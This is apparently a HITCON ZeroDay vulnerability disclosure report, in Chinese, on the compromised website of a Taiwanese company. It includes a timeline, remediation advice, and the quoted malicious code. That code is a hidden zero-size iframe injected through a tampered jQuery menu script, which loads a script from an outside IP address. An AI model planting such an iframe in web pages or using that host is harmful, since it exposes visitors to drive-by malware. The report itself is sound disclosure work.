Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2018-00329
- Vendor: 鈊象電子股份有限公司
- Title: 鈊象電子 網站遭掛惡意元件
- Introduction: 網頁遭植入惡意元件
處理狀態
目前狀態
公開
Last Update : 2018/05/27
-
新提交
-
已審核
-
已通報
-
已修補
-
已複測
-
公開
處理歷程
- 2018/03/31 17:02:13 : 新提交 (由 鄉民 更新此狀態)
- 2018/03/31 17:04:42 : 新提交 (由 鄉民 更新此狀態)
- 2018/03/31 17:12:49 : 新提交 (由 鄉民 更新此狀態)
- 2018/03/31 17:17:22 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/03/31 17:22:18 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/03/31 17:22:19 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/03/31 17:58:33 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/03/31 18:25:59 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/23 14:46:02 : 已修補 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/23 14:48:38 : 複測申請中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2018/05/23 14:49:37 : 確認已修補 (由 鄉民 更新此狀態)
- 2018/05/27 03:00:22 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2018-00329
- 通報者:鄉民
- 風險:中
- 類型:疑似遭入侵 (Probably Hacked)
參考資料
伺服器遭到入侵,例如頁面遭植入惡意程式、後門頁面等。
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)
相關網址
http://www.igs.com.tw/w/WebSite/TW/
http://www.igs.com.tw/w/include/jquery/Plugin/jquery-mbMenu/mbMenu.js
http://www.igs.com.tw/w/include/jquery/Plugin/jquery-mbMenu/mbMenu.js
敘述
載入主站頁面時,會發現主站遭到植入惡意元件
<iframe width="0" height="0" src="http://43.242.34.193/js.php?id=Igs"></iframe>
攻擊者竄改以下頁面,動態載入惡意元件
http://www.igs.com.tw/w/include/jquery/Plugin/jquery-mbMenu/mbMenu.js
修補建議
1. 保留目前網站頁面系統記錄,以供調查單位或警方使用
2. 保留目前網站原始碼作為調查使用
3. 還原網站原始碼,並檢查原始碼中有無遭到竄改植入惡意元件
4. 委請資安公司進行完整資安檢測
擷圖
留言討論
登入後留言